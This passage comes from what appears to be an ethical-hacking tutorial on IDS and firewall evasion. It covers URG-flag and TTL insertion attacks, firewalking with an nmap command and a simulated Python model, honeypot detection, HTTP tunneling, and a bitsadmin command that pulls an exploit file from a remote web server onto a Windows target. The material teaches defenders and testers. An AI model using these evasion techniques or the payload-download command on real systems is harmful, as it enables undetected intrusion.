An attacker exploits that difference. If the IDS does not model urgent data but the target host removes the urgent byte from the stream, the IDS reconstructs a stream containing an extra byte in the middle of the attack string and its signature does not match, while the host sees the clean attack string.
Here is an example of how an attacker might use the URG flag to evade an IDS:
- The attacker sends a segment carrying the first part of the attack string followed by one junk byte, with URG set and the urgent pointer covering that junk byte.
- The target's TCP stack strips the junk byte as urgent data; the IDS leaves it in place.
- The attacker sends the remainder of the attack string in a normal segment.
- The host's application receives the attack string intact and executes it.
- The IDS's reassembled stream has the junk byte inserted, so the signature fails to match.
The countermeasure is the same as for other insertion attacks: the IDS must reassemble TCP streams the way the target operating system does, including that system's handling of urgent data.
Time-To-Live Attack
A Time-To-Live (TTL) attack exploits the TTL field in the IP header. The TTL field specifies the maximum number of hops (routers) a packet may traverse; each router decrements it by one and, when it reaches zero, discards the packet and returns an ICMP "time exceeded" message to the sender.
Here is how a TTL attack against an IDS works:
- The attacker first learns the path to the target (for example with traceroute) and that the IDS sensor sits on that path, some hops before the target.
- The attacker sends a packet whose TTL is large enough to reach the IDS but too small to reach the target.
- The IDS sees the packet and adds its data to its reconstruction of the session.
- The first router past the IDS decrements the TTL to zero, discards the packet and sends an ICMP "time exceeded" message back; the target never receives it.
- By interleaving such short-TTL packets with normal ones, the attacker makes the IDS reassemble a different stream from the one the target sees, so signatures no longer match. This is an insertion attack.
- The ICMP replies also tell the attacker at which hop each packet died, which is the basis of traceroute and of firewalking.
Types of TTL attacks:
- TTL probing: Sending packets with increasing TTL values to map the hops between the attacker and the target.
- TTL scanning (firewalking): Sending packets with TTL set to expire just past a filtering device to learn which ports it forwards, without the probes ever reaching the hosts behind it.
- TTL spoofing: Manipulating the TTL to evade security measures as above, or setting the initial TTL to a value typical of a different operating system so that passive fingerprinting misattributes the packets. Note that TTL does not change a packet's apparent source address; that is a separate spoofing technique.
Detecting Honeypots
Attackers can determine the presence of honeypots by probing the services running on the system. They craft probe packets for services such as HTTP over SSL (HTTPS), SMTP over SSL (SMTPS), and IMAP over SSL (IMAPS). A port that advertises a service but denies the three-way handshake, or completes it and then fails to behave like the real service, indicates a honeypot: low-interaction honeypots typically emulate only the banner and a few canned responses. Tools to detect honeypots:
- Send-safe Honeypot Hunter (http://www.send-safe.com)
- kippo_detect (https://github.com)
Firewalking
Firewalking is a network reconnaissance technique used to discover what a remote firewall's rules allow. It sends packets whose TTL (Time-To-Live) is set to expire one hop past the firewall: if the firewall forwards the packet, the next router returns an ICMP "time exceeded" message; if the firewall filters it, nothing comes back. By comparing the responses per port, an attacker infers which ports and services the firewall lets through.
Let's dive deeper into the concept of firewalking.
What is firewalking?
Firewalking gathers information about a network's firewall rules by sending probes with carefully chosen TTL values and watching for ICMP responses. It tells the attacker which ports the firewall forwards, independently of whether any host behind it is actually listening.
How does firewalking work?
Here is a step-by-step explanation of the firewalking process:
- Ramping phase: The attacker sends probes with increasing TTL values (1, 2, 3, ...) towards the target. Each router at which the TTL expires replies with an ICMP "time exceeded" message, exactly as in traceroute, until a reply comes from the firewall (gateway) itself. This gives the hop count to the firewall.
- Scanning phase: The attacker sends a probe to each port of interest with TTL set to the firewall's hop count plus one.
- Forwarded: If the firewall allows the port, it forwards the probe, the TTL expires at the next hop, and that router returns an ICMP "time exceeded" message.
- Filtered: If the firewall blocks the port, the probe is dropped (usually silently) and no response arrives.
What information can be gathered through firewalking?
By analyzing the ICMP responses, the attacker can gather the following information:
- Forwarded ports: Ports the firewall allows through to the protected network.
- Blocked ports: Ports the firewall drops.
- Filtered versus closed: Because the probe expires before reaching any host, a "forwarded" result says nothing about whether a host behind the firewall is listening on that port; a normal port scan is needed for that.
- Firewall rules: From the per-port results the attacker infers the firewall's rule set.
Types of firewalking
There are two types of firewalking:
- TCP firewalking: Probes are TCP packets, testing which TCP ports the firewall forwards.
- UDP firewalking: Probes are UDP packets, testing which UDP ports the firewall forwards.
Tools used for firewalking
There are several tools available that can be used for firewalking, including:
- Nmap: Its firewalk NSE script (nmap --script firewalk --traceroute <target>) implements the technique using Nmap's own traceroute results for the ramping phase.
- hping3: A packet-crafting tool that can send TCP or UDP probes with a chosen TTL, flags and port, so the scanning phase can be done by hand.
- Firewalk: The original tool written specifically for firewalking.
Firewalking is active reconnaissance: the probes are sent into the target network and are visible to the firewall and to any IDS in front of it. It is, however, quieter than a normal port scan, because the probes expire before reaching the hosts behind the firewall, which therefore never see them.
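The following Python is an added example, not code from the page, and serves both the TTL attack section above and this firewalking section. It models a constructed path (attacker, three routers with a filtering gateway at the second, an IDS tap after the first, and a target) and runs three procedures against it: TTL probing to find the hop count, firewalking through the gateway, and a TTL insertion attack against the IDS tap. The hop positions, the gateway's allowed ports, and the assumption that the attacker already knows which hop is the gateway (in practice, from the traceroute output) are all assumptions of this example.

```python
from dataclasses import dataclass, field

# Added example, not from the page. Everything about the path is constructed:
# attacker -> R1 -> R2 (filtering gateway, allows 80/443) -> R3 -> target,
# with an IDS tap watching the link just after R1.


@dataclass
class Probe:
    ttl: int
    dport: int = 80
    seq: int = 0
    data: bytes = b""


@dataclass
class Network:
    """Routers are numbered from 1; the target is hop num_routers + 1."""
    num_routers: int = 3
    firewall_hop: int = 2
    allowed_ports: frozenset = frozenset({80, 443})
    ids_after_hop: int = 1
    ids_stream: dict = field(default_factory=dict)    # seq -> byte, first data wins
    host_stream: dict = field(default_factory=dict)   # seq -> byte, first data wins

    @staticmethod
    def _record(stream, p):
        for i, b in enumerate(p.data):
            stream.setdefault(p.seq + i, b)           # a later overlap does not overwrite

    def send(self, p):
        """Forward a probe hop by hop. Returns (outcome, hop)."""
        ttl = p.ttl
        for hop in range(1, self.num_routers + 1):
            if ttl <= 1:                              # router receives TTL 1: discard, ICMP type 11
                return ("icmp_time_exceeded", hop)
            ttl -= 1
            if hop == self.firewall_hop and p.dport not in self.allowed_ports:
                return ("dropped_silently", hop)      # typical firewall: no reply at all
            if hop == self.ids_after_hop:
                self._record(self.ids_stream, p)      # the tap sees whatever R1 forwards
        self._record(self.host_stream, p)
        return ("delivered", self.num_routers + 1)


def stream_bytes(stream):
    return bytes(stream[k] for k in sorted(stream))


def ttl_probe(net, max_ttl=16):
    """TTL probing: raise the TTL one hop at a time until the probe is delivered."""
    results = []
    for ttl in range(1, max_ttl + 1):
        outcome, hop = net.send(Probe(ttl=ttl, dport=80))
        results.append((ttl, outcome, hop))
        if outcome == "delivered":
            break
    return results


def firewalk(net, gateway_hop, ports):
    """Scanning phase: probe each port with TTL = gateway_hop + 1. A time-exceeded
    from the hop past the gateway proves the gateway forwarded the probe; silence
    means it filtered it. The target host never receives these probes."""
    verdict = {}
    for port in ports:
        outcome, hop = net.send(Probe(ttl=gateway_hop + 1, dport=port))
        forwarded = (outcome, hop) == ("icmp_time_exceeded", gateway_hop + 1)
        verdict[port] = "forwarded" if forwarded else "filtered"
    return verdict


def ttl_insertion(net):
    """Insertion attack: a chaff segment with a short TTL reaches the IDS tap but
    expires before the host. First-wins reassembly at the IDS keeps the chaff;
    the host only ever sees the real bytes. Returns (ids_view, host_view)."""
    net.send(Probe(ttl=64, seq=0, data=b"GET /cgi-"))                       # seen by both
    net.send(Probe(ttl=net.ids_after_hop + 1, seq=9, data=b"XXXXXXX"))      # IDS only
    net.send(Probe(ttl=64, seq=9, data=b"bin/phf"))                         # host only
    return stream_bytes(net.ids_stream), stream_bytes(net.host_stream)


if __name__ == "__main__":
    print("probe:", ttl_probe(Network()))
    print("firewalk:", firewalk(Network(), gateway_hop=2, ports=[22, 80, 443, 8080]))
    print("insertion:", ttl_insertion(Network()))
```

Two details are worth noticing. The firewalk probes use TTL = gateway + 1 rather than TTL = gateway: a probe that expires at the gateway itself draws a time-exceeded reply regardless of the port, so it proves nothing about the rules. And the firewalk and insertion probes both pass the IDS tap, which is why neither technique is passive.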
Bypass Firewall Rules using HTTP/FTP Tunneling
HTTP tunneling lets attackers carry arbitrary traffic past a firewall that allows HTTP. It works when the target organization lets TCP port 80 (or 443) through the firewall or proxy without inspecting the payload: the attacker's traffic is encapsulated inside what look like ordinary HTTP requests and responses to a server the attacker controls. Many firewalls do not examine the payload of an HTTP request to confirm that it is legitimate web traffic, so any protocol can be tunneled over TCP port 80. Application-aware firewalls and proxies that inspect request bodies and enforce protocol conformance reduce the effectiveness of this technique.
HTTPort allows users to bypass an HTTP proxy that blocks Internet access to e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC, etc. The Internet software is configured to connect to the local PC as if it were the required remote server; HTTPort intercepts that connection and runs it via a tunnel through the proxy. HTTPort works with devices such as proxies or firewalls that allow HTTP traffic, and thus provides access to websites and Internet apps. HTTPort tunnels using one of two modes: SSL/CONNECT mode, or a remote host.
The remote host method is capable of tunneling through any proxy. HTTPort uses a special server program called HTTHost, installed outside the proxy-blocked network. HTTHost is a web server, so when HTTPort is tunneling it sends a series of HTTP requests to HTTHost; the proxy sees what looks like a user browsing a website and allows it. HTTHost performs its half of the tunneling and communicates with the target servers. This mode is slower but works in most cases, and it encrypts the tunneled data, so the proxy's logs show only opaque HTTP requests to HTTHost.
Bypass Firewall through Windows BITSAdmin
BITS (Background Intelligent Transfer Service) is a component of Windows XP and later versions of Windows. System administrators and programmers use it to download files from, or upload files to, HTTP web servers and SMB file shares; Windows Update itself relies on it, so outbound BITS traffic is often permitted. BITSAdmin is the command-line tool for creating download or upload jobs and monitoring their progress.
Place Exploit.exe on a web server (or SMB share) reachable from the target, then run the following command on the Windows machine to fetch the file through BITS:

```
bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe
```

The first argument is the job name, followed by the remote URL and the local destination path. Note that bitsadmin.exe is deprecated; the PowerShell BITS cmdlets (Start-BitsTransfer) provide the same functionality, and defenders should monitor BITS job creation from either interface.